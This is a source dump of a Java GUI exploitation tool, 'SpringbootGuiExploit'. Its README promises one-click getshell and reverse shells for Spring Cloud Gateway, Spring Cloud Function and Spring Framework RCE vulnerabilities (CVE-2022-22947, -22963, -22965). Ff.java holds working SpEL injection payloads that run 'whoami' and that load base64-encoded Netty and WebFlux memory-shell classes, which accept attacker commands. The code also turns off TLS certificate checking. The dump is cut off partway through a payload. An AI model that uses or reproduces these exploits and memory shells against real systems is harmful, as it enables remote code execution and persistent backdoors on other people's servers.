├── README.md
├── main
└── java
│ ├── Ff.java
│ ├── META-INF
│ └── MANIFEST.MF
│ ├── Main.java
│ ├── TrustAllTrustManager.java
│ ├── ff.fxml
│ ├── main.iml
│ └── out
│ └── production
│ └── main
│ ├── Ff$1.class
│ ├── Ff.class
│ ├── META-INF
│ └── MANIFEST.MF
│ ├── Main.class
│ ├── TrustAllTrustManager.class
│ ├── ff.fxml
│ └── main.iml
└── out
├── artifacts
└── ceshi_jar
│ └── ceshi.jar
└── production
└── ceshi
├── Ff$1.class
├── Ff$2.class
├── Ff$ResponseHeader.class
├── Ff.class
├── META-INF
└── MANIFEST.MF
├── Main.class
├── TrustAllTrustManager.class
├── ff.fxml
├── main.iml
└── out
└── production
└── main
├── META-INF
└── MANIFEST.MF
├── ff.fxml
└── main.iml
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 | 没事写一个工具
4 |
5 | SpringbootGuiExploit漏洞利用工具采用java开发
6 |
7 | 收录漏洞
8 |
9 | +++ Springboot Gateway RCE(CVE-2022-22947) 一键检测漏洞 一键getshell
10 |
11 | +++Spring Cloud Function SpEL RCE (CVE-2022-22963) 一键检测漏洞 一键反弹shell
12 |
13 | +++Spring Framework RCE (CVE-2022-22965) 一键检测漏洞 一键getshell
14 |
15 | 优化http网站漏洞检测 优化网站去重/ 优化错误编码输出去重
16 |
17 | 新增Jolokia Realm JNDI RCE漏洞检查
18 |
19 | 新增SnakeYAML_RCE漏洞检查
20 |
21 | 新增SpringBoot-Eureka-xstream-rce漏洞检查
22 |
--------------------------------------------------------------------------------
/main/java/Ff.java:
--------------------------------------------------------------------------------
1 | import javafx.collections.FXCollections;
2 | import javafx.collections.ObservableList;
3 | import javafx.embed.swing.JFXPanel;
4 | import javafx.event.ActionEvent;
5 | import javafx.fxml.FXML;
6 | import javafx.scene.Scene;
7 | import javafx.scene.control.*;
8 | import javafx.scene.layout.StackPane;
9 | import javafx.scene.layout.VBox;
10 | import jdk.internal.org.objectweb.asm.tree.analysis.Value;
11 | import jdk.nashorn.internal.objects.NativeError;
12 | import jdk.nashorn.internal.objects.annotations.Constructor;
13 | import net.sf.json.JSONArray;
14 | import net.sf.json.JSONObject;
15 | import sun.net.www.http.HttpClient;
16 | import sun.nio.ch.Net;
17 | import javafx.scene.control.ComboBox;
18 |
19 | import java.io.*;
20 | import java.net.*;
21 | import java.net.HttpURLConnection;
22 |
23 | import javax.net.ssl.*;
24 | import javax.print.DocFlavor;
25 | import java.net.URL;
26 | import java.nio.charset.StandardCharsets;
27 | import java.security.KeyManagementException;
28 | import java.security.NoSuchAlgorithmException;
29 | import java.time.Duration;
30 | import java.util.regex.Matcher;
31 | import java.util.regex.Pattern;
32 |
33 |
34 | import static sun.net.www.http.HttpClient.*;
35 |
36 |
37 | public class Ff {
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 | @FXML
46 | private Button Click1;
47 |
48 | @FXML
49 | private Button Click;
50 |
51 | @FXML
52 | private TextArea responsetest;
53 |
54 | @FXML
55 | private TextArea responsetest2;
56 |
57 |
58 | @FXML
59 | private TextField urlTest;
60 |
61 | @FXML
62 | private TextField urltest1;
63 |
64 | @FXML
65 | private TextField urltest5;
66 |
67 |
68 | @FXML
69 | private ComboBox chbox;
70 |
71 |
72 |
73 |
74 |
75 |
76 | private JFXPanel primaryStage;
77 |
78 | @FXML
79 | void Clickevent2(ActionEvent event) {
80 | send8();
81 | }
82 |
83 | @FXML
84 | void Clickevent3(ActionEvent event) {
85 | // sendGetRequest1();
86 |
87 | // send5();
88 | rce2();
89 | }
90 |
91 |
92 | @FXML
93 | private TextField urltest4;
94 | private TextArea fd;
95 |
96 | @FXML
97 | private TextArea responsetest11;
98 |
99 | @FXML
100 | private TextArea responsetest1;
101 |
102 |
103 | @FXML
104 | void send4(ActionEvent event) {
105 |
106 | send6();
107 |
108 |
109 | }
110 |
111 |
112 |
113 | @FXML
114 | void rce(ActionEvent event) {
115 |
116 |
117 |
118 |
119 |
120 | }
121 |
122 |
123 | public void send8(){
124 |
125 | String url = urlTest.getText();
126 | if (url.endsWith("/")) {
127 | url = url.substring(0, url.length() - 1); // 去除最后一个字符(斜杠)
128 | }
129 |
130 | try {
131 | // System.setProperty("http.proxyHost", "127.0.0.1");
132 | // System.setProperty("http.proxyPort", "8080");
133 | URL url1 = new URL(url + "/actuator/gateway/routes/test113");
134 | // URL url1 = new URL(url + "/cttl/cmd?r=cat /etc/passwd");
135 | // URL url1 = new URL(url+"/cttl/cmd?r="+urltest1.getText());
136 | HttpURLConnection connection = (HttpURLConnection) url1.openConnection();
137 | connection.setRequestMethod("GET");
138 |
139 | // System.out.println("Response Code : " + responseCode);
140 |
141 | BufferedReader br = new BufferedReader(new InputStreamReader(connection.getInputStream()));
142 |
143 | StringBuffer response = new StringBuffer();
144 | String inputLine;
145 | response.append(inputLine = br.readLine());
146 | while ((inputLine = br.readLine()) != null) {
147 |
148 | response.append(inputLine);
149 | }
150 | // responsetest2.appendText(response.toString());
151 |
152 |
153 |
154 |
155 | // response.append(inputLine);
156 | // String regex = "\"AddResponseHeader\":\\\"([^\"]*)\\\"";
157 | // Pattern pattern = Pattern.compile(regex);
158 | // Matcher matcher = pattern.matcher(response);
159 | // if (matcher.find()) {
160 | // String value = matcher.group(0); // 提取匹配的值(这里是name的值)
161 | // responsetest2.appendText("返回标识:"+value+"\n");
162 | // } else {
163 | // responsetest2.appendText("返回标识:"+"\n");
164 | // }
165 |
166 |
167 |
168 |
169 | // JSONArray filtersArray = jsonObject.getJSONArray("filters");
170 | // for (int i = 0; i < filtersArray.toArray().length; i++) {
171 |
172 | // Object filterElement = filtersArray.get(i);
173 | // System.out.println(filterElement);;
174 |
175 |
176 |
177 |
178 | } catch (Exception e) {
179 |
180 | e.printStackTrace();
181 |
182 | }
183 | }
184 |
185 |
186 | @FXML
187 | private ComboBox uurltest4;
188 |
189 |
190 | @FXML
191 | //private HttpClient client=HttpClient.newHttpClient();
192 |
193 |
194 | public void rce() {
195 |
196 |
197 |
198 |
199 |
200 | }
201 |
202 | public void ceshi() {
203 |
204 |
205 | }
206 |
207 | public void rce2() {
208 |
209 | try {
210 |
211 |
212 | Button button = new Button();
213 | System.setProperty("https.proxyHost", "127.0.0.1");
214 | System.setProperty("https.proxyPort", "8080");
215 |
216 | // responsetest.appendText("开始检测Spring Cloud Gateway RCE(CVE-2022-22947)"+"\n");
217 | HostnameVerifier hv = new HostnameVerifier() {
218 | @Override
219 | public boolean verify(String urlHostName, SSLSession session) {
220 | return true;
221 | }
222 | };
223 | // 配置认证管理器
224 | TrustManager[] trustAllCerts = {new TrustAllTrustManager()};
225 | SSLContext sc = SSLContext.getInstance("SSL");
226 | SSLSessionContext sslsc = sc.getServerSessionContext();
227 | sslsc.setSessionTimeout(0);
228 | sc.init(null, trustAllCerts, null);
229 | HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());
230 | // 激活主机认证
231 | HttpsURLConnection.setDefaultHostnameVerifier(hv);
232 | // Button button = new Button("Click");
233 | // fd = new TextArea();
234 |
235 |
236 | String url = urlTest.getText();
237 | if (url.endsWith("/")) {
238 | url = url.substring(0, url.length() - 1); // 去除最后一个字符(斜杠)
239 | }
240 | // if (isValidUrl(url)) {
241 |
242 | // Alert alert = new Alert(Alert.AlertType.ERROR);alert.setTitle("拼写检查");alert.setHeaderText("");alert.setContentText("输入的不是有效的网址!");alert.showAndWait();
243 | if (!isValidUrl(url)) responsetest.appendText("输入的不是有效的网址" + "\n");
244 | else {
245 |
246 | }
247 | URL url1 = new URL(url + "/actuator/gateway/routes/test113");
248 |
249 | String json = "{\n" +
250 | " \"id\": \"test\",\n" +
251 | " \"filters\": [{\n" +
252 | " \"name\": \"AddResponseHeader\",\n" +
253 | " \"args\": {\n" +
254 | " \"name\": \"Result\",\n" +
255 | " \"value\": \"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\"whoami\\\"}).getInputStream()))}\"\n" +
256 | " }\n" +
257 | " }],\n" +
258 | " \"uri\": \"http://example.com\"\n" +
259 | "}";
260 | String json1 = "{\n" +
261 | " \"id\": \"test\",\n" +
262 | " \"filters\": [{\n" +
263 | " \"name\": \"AddResponseHeader\",\n" +
264 | " \"args\": {\"name\": \"Result\",\"value\": \"#{T(org.springframework.cglib.core.ReflectUtils).defineClass('NettyMemshell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAADQBFAoAPgB9CAB+BwB/CABTBwCACgAFAIEKAIIAgwcAhAoAggCFCgCGAIcKAIYAiAoACACJCgAFAIoIAIsKAIwAjQgASwoABQCOCgCPAIMKAI8AkAoABQCRCABOCACSBwCTCgAXAH0KAI8AlAgAlQcAlggAlwsAmACZCACaCACbCwCcAJ0HAJ4LACEAnwgAoAoAoQCiCgChAKMHAKQKAKUApgoApQCnCgCoAKkKACYAqggAqwoAJgCsCgAmAK0JAK4ArwoAFwCwCgAbALELALIAswcAtAkAtQC2CQC3ALgKALkAugoAMgC7CwC8AJ8JAL0AvggAvwoAoQDACwCyAMEJAMIAwwsAxADFBwDGBwDHAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAA9MTmV0dHlNZW1zaGVsbDsBAAhkb0luamVjdAEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAVX3ZhbCRkaXNwb3NhYmxlU2VydmVyAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAFHZhbCRkaXNwb3NhYmxlU2VydmVyAQASTGphdmEvbGFuZy9PYmplY3Q7AQAHX2NvbmZpZwEABmNvbmZpZwEAEF9kb09uQ2hhbm5lbEluaXQBAAZ0aHJlYWQBAAFpAQABSQEACmdldFRocmVhZHMBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAB3RocmVhZHMBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQADbXNnAQASTGphdmEvbGFuZy9TdHJpbmc7AQANU3RhY2tNYXBUYWJsZQcAyAcAyQcAhAcAlgEADW9uQ2hhbm5lbEluaXQBAFcoTHJlYWN0b3IvbmV0dHkvQ29ubmVjdGlvbk9ic2VydmVyO0xpby9uZXR0eS9jaGFubmVsL0NoYW5uZWw7TGphdmEvbmV0L1NvY2tldEFkZHJlc3M7KVYBABJjb25uZWN0aW9uT2JzZXJ2ZXIBACJMcmVhY3Rvci9uZXR0eS9Db25uZWN0aW9uT2JzZXJ2ZXI7AQAHY2hhbm5lbAEAGkxpby9uZXR0eS9jaGFubmVsL0NoYW5uZWw7AQANc29ja2V0QWRkcmVzcwEAGExqYXZhL25ldC9Tb2NrZXRBZGRyZXNzOwEACHBpcGVsaW5lAQAiTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbFBpcGVsaW5lOwEAEE1ldGhvZFBhcmFtZXRlcnMBAAtjaGFubmVsUmVhZAEAPShMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlckNvbnRleHQ7TGphdmEvbGFuZy9PYmplY3Q7KVYBAANjbWQBAApleGVjUmVzdWx0AQALaHR0cFJlcXVlc3QBAClMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBSZXF1ZXN0OwEAA2N0eAEAKExpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxIYW5kbGVyQ29udGV4dDsHAJ4BAApFeGNlcHRpb25zAQAEc2VuZAEAbShMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlckNvbnRleHQ7TGphdmEvbGFuZy9TdHJpbmc7TGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXM7KVYBAAdjb250ZXh0AQAGc3RhdHVzAQAwTGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXM7AQAIcmVzcG9uc2UBAC5MaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0Z1bGxIdHRwUmVzcG9uc2U7AQAKU291cmNlRmlsZQEAEk5ldHR5TWVtc2hlbGwuamF2YQwAQABBAQAMaW5qZWN0LXN0YXJ0AQAQamF2YS9sYW5nL1RocmVhZAEAD2phdmEvbGFuZy9DbGFzcwwAygDLBwDJDADMAM0BABBqYXZhL2xhbmcvT2JqZWN0DADOAM8HANAMANEA0gwA0wDUDADVANYMANcASAEADk5ldHR5V2ViU2VydmVyBwDIDADYANkMANoA2wcA3AwA0wDdDADeANYBAA9kb09uQ2hhbm5lbEluaXQBAA1OZXR0eU1lbXNoZWxsDADfAOABAA5pbmplY3Qtc3VjY2VzcwEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAxpbmplY3QtZXJyb3IHAOEMAGcA4gEAH3JlYWN0b3IubGVmdC5odHRwVHJhZmZpY0hhbmRsZXIBABBtZW1zaGVsbF9oYW5kbGVyBwDjDADkAOUBACdpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cFJlcXVlc3QMAOYA5wEABVgtQ01EBwDoDADYAOkMANMA6gEAEWphdmEvdXRpbC9TY2FubmVyBwDrDADsAO0MAO4A7wcA8AwA8QDyDABAAPMBAAJcQQwA9AD1DAD2AEgHAPcMAPgAeAwAdAB1DAD5AEEHAPoMAPsA/AEAM2lvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9EZWZhdWx0RnVsbEh0dHBSZXNwb25zZQcA/QwA/gD/BwEADAEBAQIHAQMMAQQBBQwAQAEGBwEHBwEIDAEJAQoBABl0ZXh0L3BsYWluOyBjaGFyc2V0PVVURi04DADfAQsMAQwBDQcBDgwBDwEQBwERDAESARMBACVpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxEdXBsZXhIYW5kbGVyAQAncmVhY3Rvci9uZXR0eS9DaGFubmVsUGlwZWxpbmVDb25maWd1cmVyAQAQamF2YS9sYW5nL1N0cmluZwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAXamF2YS9sYW5nL3JlZmxlY3QvQXJyYXkBAAlnZXRMZW5ndGgBABUoTGphdmEvbGFuZy9PYmplY3Q7KUkBAANnZXQBACcoTGphdmEvbGFuZy9PYmplY3Q7SSlMamF2YS9sYW5nL09iamVjdDsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAAdnZXROYW1lAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEADWdldFN1cGVyY2xhc3MBAANzZXQBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYBABhpby9uZXR0eS9jaGFubmVsL0NoYW5uZWwBACQoKUxpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxQaXBlbGluZTsBACBpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxQaXBlbGluZQEACWFkZEJlZm9yZQEAaShMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL1N0cmluZztMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlcjspTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbFBpcGVsaW5lOwEAB2hlYWRlcnMBACsoKUxpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cEhlYWRlcnM7AQAnaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBIZWFkZXJzAQAVKExqYXZhL2xhbmcvU3RyaW5nOylaAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAEbmV4dAEALmlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXMBAAJPSwEAD3ByaW50U3RhY2tUcmFjZQEAJmlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEhhbmRsZXJDb250ZXh0AQAPZmlyZUNoYW5uZWxSZWFkAQA8KExqYXZhL2xhbmcvT2JqZWN0OylMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlckNvbnRleHQ7AQAnaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBWZXJzaW9uAQAISFRUUF8xXzEBAClMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBWZXJzaW9uOwEAGWlvL25ldHR5L3V0aWwvQ2hhcnNldFV0aWwBAAVVVEZfOAEAGkxqYXZhL25pby9jaGFyc2V0L0NoYXJzZXQ7AQAYaW8vbmV0dHkvYnVmZmVyL1VucG9vbGVkAQAMY29waWVkQnVmZmVyAQBNKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlO0xqYXZhL25pby9jaGFyc2V0L0NoYXJzZXQ7KUxpby9uZXR0eS9idWZmZXIvQnl0ZUJ1ZjsBAHUoTGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwVmVyc2lvbjtMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBSZXNwb25zZVN0YXR1cztMaW8vbmV0dHkvYnVmZmVyL0J5dGVCdWY7KVYBACxpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvRnVsbEh0dHBSZXNwb25zZQEAK2lvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwSGVhZGVyTmFtZXMBAAxDT05URU5UX1RZUEUBABtMaW8vbmV0dHkvdXRpbC9Bc2NpaVN0cmluZzsBAFUoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7TGphdmEvbGFuZy9PYmplY3Q7KUxpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cEhlYWRlcnM7AQANd3JpdGVBbmRGbHVzaAEANChMamF2YS9sYW5nL09iamVjdDspTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEZ1dHVyZTsBACZpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxGdXR1cmVMaXN0ZW5lcgEABUNMT1NFAQAoTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEZ1dHVyZUxpc3RlbmVyOwEAHmlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEZ1dHVyZQEAC2FkZExpc3RlbmVyAQBSKExpby9uZXR0eS91dGlsL2NvbmN1cnJlbnQvR2VuZXJpY0Z1dHVyZUxpc3RlbmVyOylMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsRnV0dXJlOwAhABcAPgABAD8AAAAFAAEAQABBAAEAQgAAAC8AAQABAAAABSq3AAGxAAAAAgBDAAAABgABAAAAFgBEAAAADAABAAAABQBFAEYAAAAJAEcASAABAEIAAAHDAAQACgAAALUSAksSAxIEA70ABbYABkwrBLYABysBA70ACLYACU0DPh0suAAKogCHLB24AAs6BBkExgB1GQS2AAy2AA0SDrYAD5kAZRkEtgAMEhC2ABE6BRkFBLYAEhkFGQS2ABM6BhkGtgAMtgAUEhW2ABE6BxkHBLYAEhkHGQa2ABM6CBkItgAMtgAUtgAUEha2ABE6CRkJBLYAEhkJGQi7ABdZtwAYtgAZEhpLhAMBp/93pwAHTBIcSyqwAAEAAwCsAK8AGwADAEMAAABaABYAAAAYAAMAGgAPABsAFAAcAB4AHgAoAB8ALwAgAEQAIQBQACIAVgAjAF8AJABuACUAdAAmAH0AJwCPACgAlQApAKMAKgCmAB4ArAAvAK8ALQCwAC4AswAwAEQAAABwAAsAUABWAEkASgAFAF8ARwBLAEwABgBuADgATQBKAAcAfQApAE4ATAAIAI8AFwBPAEoACQAvAHcAUABMAAQAIACMAFEAUgADAA8AnQBTAFQAAQAeAI4AVQBMAAIAsAADAFYAVwABAAMAsgBYAFkAAABaAAAAHgAF/wAgAAQHAFsHAFwHAF0BAAD7AIX4AAVCBwBeAwABAF8AYAACAEIAAAB2AAUABQAAABwsuQAdAQA6BBkEEh4SH7sAF1m3ABi5ACAEAFexAAAAAgBDAAAADgADAAAANgAIADgAGwA5AEQAAAA0AAUAAAAcAEUARgAAAAAAHABhAGIAAQAAABwAYwBkAAIAAAAcAGUAZgADAAgAFABnAGgABABpAAAADQMAYQAAAGMAAABlAAAAAQBqAGsAAwBCAAABEAAEAAYAAABhLMEAIZkAVCzAACFOLbkAIgEAEiO2ACSZADctuQAiAQASI7YAJToEuwAmWbgAJxkEtgAotgAptwAqEiu2ACy2AC06BSorGQWyAC63AC+xpwAKOgQZBLYAMCssuQAxAgBXsQABAAwATQBRABsAAwBDAAAAMgAMAAAAPwAHAEAADABCABoAQwAnAEQAQwBGAE0ARwBOAEsAUQBJAFMASgBYAE0AYABOAEQAAABIAAcAJwAnAGwAWQAEAEMACwBtAFkABQBTAAUAVgBXAAQADABMAG4AbwADAAAAYQBFAEYAAAAAAGEAcABxAAEAAABhAFgATAACAFoAAAAPAAP8AE4HAHJCBwBe+gAGAHMAAAAEAAEAGwBpAAAACQIAcAAAAFgAAAACAHQAdQACAEIAAACUAAYABQAAADa7ADJZsgAzLSyyADS4ADW3ADY6BBkEuQA3AQCyADgSObYAOlcrGQS5ADsCALIAPLkAPQIAV7EAAAACAEMAAAASAAQAAABSABQAUwAkAFQANQBVAEQAAAA0AAUAAAA2AEUARgAAAAAANgBwAHEAAQAAADYAdgBZAAIAAAA2AHcAeAADABQAIgB5AHoABABpAAAADQMAcAAAAHYAAAB3AAAAAQB7AAAAAgB8'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}\"}\n" +
265 | " }],\n" +
266 | " \"uri\": \"http://example.com\",\n" +
267 | " \"order\": 0\n" +
268 | "}";
269 |
270 | String json2 = "{\n" +
271 | "\"predicates\":[{\"name\": \"Path\",\n" +
272 | "\"args\":{\"_genkey_0\":\"/gmem**\"}\n" +
273 | "}\n" +
274 | "],\n" +
275 | " \"id\": \"wolaile\",\n" +
276 | " \"filters\": [{\n" +
277 | " \"name\": \"AddResponseHeader\",\n" +
278 | " \"args\": {\n" +
279 | " \"name\": \"Result\",\n" +
280 | " \"value\": \"#{T(org.springframework.cglib.core.ReflectUtils).defineClass('com.example.GMemShell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAADQBeAoADQC2BwC3CgACALYJABIAuAoAAgC5CQASALoKAAIAuwoAEgC8CQASAL0KAA0AvggAcgcAvwcAwAcAwQcAwgoADADDCgAOAMQHAMUIAJ8HAMYHAMcKAA8AyAsAyQDKCgASALYKAA4AywgAzAcAzQoAGwDOCADPBwDQBwDRCgDSANMKANIA1AoAHgDVBwDWCACBBwCECQDXANgKANcA2QgA2goA2wDcBwDdCgAVAN4KACoA3woA2wDgCgDbAOEIAOIKAOMA5AoAFQDlCgDjAOYHAOcKAOMA6AoAMwDpCgAzAOoKABUA6wgA7AoADADtCADuCgAMAO8IAPAIAPEKAAwA8ggA8wgA9AgA9QgA9ggA9wsAFAD4EgAAAP4KAP8BAAcBAQkBAgEDCgBHAQQKABsBBQsBBgEHCgASAQgKABIBCQkAEgEKCAELCwEMAQ0KABIBDgsBDAEPCAEQBwERCgBUALYKAA0BEgoAFQETCgANALsKAFQBFAoAEgEVCgAVARYKAP8BFwcBGAoAXQC2CABlCAEZAQAFc3RvcmUBAA9MamF2YS91dGlsL01hcDsBAAlTaWduYXR1cmUBADVMamF2YS91dGlsL01hcDxMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL09iamVjdDs+OwEABHBhc3MBABJMamF2YS9sYW5nL1N0cmluZzsBAANtZDUBAAJ4YwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAXTGNvbS9leGFtcGxlL0dNZW1TaGVsbDsBAAhkb0luamVjdAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAVcmVnaXN0ZXJIYW5kbGVyTWV0aG9kAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA5leGVjdXRlQ29tbWFuZAEAEnJlcXVlc3RNYXBwaW5nSW5mbwEAQ0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbzsBAANtc2cBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQADb2JqAQASTGphdmEvbGFuZy9PYmplY3Q7AQAEcGF0aAEADVN0YWNrTWFwVGFibGUHAM0HAMcBABBNZXRob2RQYXJhbWV0ZXJzAQALZGVmaW5lQ2xhc3MBABUoW0IpTGphdmEvbGFuZy9DbGFzczsBAApjbGFzc2J5dGVzAQACW0IBAA51cmxDbGFzc0xvYWRlcgEAGUxqYXZhL25ldC9VUkxDbGFzc0xvYWRlcjsBAAZtZXRob2QBAApFeGNlcHRpb25zAQABeAEAByhbQlopW0IBAAFjAQAVTGphdmF4L2NyeXB0by9DaXBoZXI7AQABcwEAAW0BAAFaBwDFBwEaAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAB1MamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEAA3JldAEADGJhc2U2NEVuY29kZQEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBAAdFbmNvZGVyAQAGYmFzZTY0AQARTGphdmEvbGFuZy9DbGFzczsBAAJicwEABXZhbHVlAQAMYmFzZTY0RGVjb2RlAQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgEAB2RlY29kZXIBAANjbWQBAF0oTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZTspTG9yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9SZXNwb25zZUVudGl0eTsBAAxidWZmZXJTdHJlYW0BAAJleAEABXBkYXRhAQAyTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZTsBABlSdW50aW1lVmlzaWJsZUFubm90YXRpb25zAQA1TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2JpbmQvYW5ub3RhdGlvbi9Qb3N0TWFwcGluZzsBAAQvY21kAQAMbGFtYmRhJGNtZCQwAQBHKExvcmcvc3ByaW5nZnJhbWV3b3JrL3V0aWwvTXVsdGlWYWx1ZU1hcDspTHJlYWN0b3IvY29yZS9wdWJsaXNoZXIvTW9ubzsBAAZhcnJPdXQBAB9MamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW07AQABZgEAAmlkAQAEZGF0YQEAKExvcmcvc3ByaW5nZnJhbWV3b3JrL3V0aWwvTXVsdGlWYWx1ZU1hcDsBAAZyZXN1bHQBABlMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7BwC3AQAIPGNsaW5pdD4BAApTb3VyY2VGaWxlAQAOR01lbVNoZWxsLmphdmEMAGkAagEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABlAGYMARsBHAwAaABmDAEdAR4MAGcAkgwAZwBmDAEfASABAA9qYXZhL2xhbmcvQ2xhc3MBABBqYXZhL2xhbmcvT2JqZWN0AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQBBb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L21ldGhvZC9SZXF1ZXN0TWFwcGluZ0luZm8MASEBIgwBIwEkAQAVY29tL2V4YW1wbGUvR01lbVNoZWxsAQAwb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmVyL1NlcnZlcldlYkV4Y2hhbmdlAQAQamF2YS9sYW5nL1N0cmluZwwBJQEoBwEpDAEqASsMASwBLQEAAm9rAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwBLgBqAQAFZXJyb3IBABdqYXZhL25ldC9VUkxDbGFzc0xvYWRlcgEADGphdmEvbmV0L1VSTAcBLwwBMAExDAEyATMMAGkBNAEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgcBNQwBNgCZDAE3ATgBAANBRVMHARoMATkBOgEAH2phdmF4L2NyeXB0by9zcGVjL1N